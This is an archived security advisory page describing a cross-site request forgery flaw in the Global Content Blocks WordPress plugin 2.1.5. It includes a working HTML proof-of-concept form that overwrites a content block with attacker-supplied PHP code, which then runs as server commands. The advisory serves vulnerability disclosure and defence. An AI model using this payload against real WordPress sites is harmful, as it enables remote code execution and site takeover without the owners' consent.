exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Global Content Blocks 2.1.5 Cross Site Request Forgery

WordPress Global Content Blocks 2.1.5 Cross Site Request Forgery
Posted Mar 3, 2017
Authored by Yorick Koster, Securify B.V.

WordPress Global Content Blocks plugin version 2.1.5 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 0f2b9abeb8b770a6bc6a9870916904a2c4d2bfff9701bd7c0c0df561111e1a69

WordPress Global Content Blocks 2.1.5 Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in Global Content Blocks WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Global Content Blocks WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update a content block to overwrite it with arbitrary PHP
code. Visiting a page or blog post that uses this content block will
cause the attacker's PHP code to be executed.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0031

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Global Content Blocks WordPress
Plugin version 2.1.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html

The issue exists due to the fact that Global Content Blocks does not use the Cross-Site Request Forgery protection provided by WordPress. Actions with Global Content Blocks have a predictable format, thus an attacker can forge a request that can be executed by a logged in Administrator. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

The following proof of concept will update/overwrite the content block with id 1. In order to run the attacker's PHP code, a page/blog needs to be viewed that contains this content block (eg, [contentblock id=1]).

<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=global-content-blocks" method="POST">
<input type="hidden" name="gcb_view" value="update" />
<input type="hidden" name="update_it" value="1" />
<input type="hidden" name="gcb_name" value="Foo" />
<input type="hidden" name="gcb_custom_id" value="" />
<input type="hidden" name="gcb_type" value="php" />
<input type="hidden" name="gcb_description" value="" />
<input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
<input type="hidden" name="gcb_updateshortcode" value="Update" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close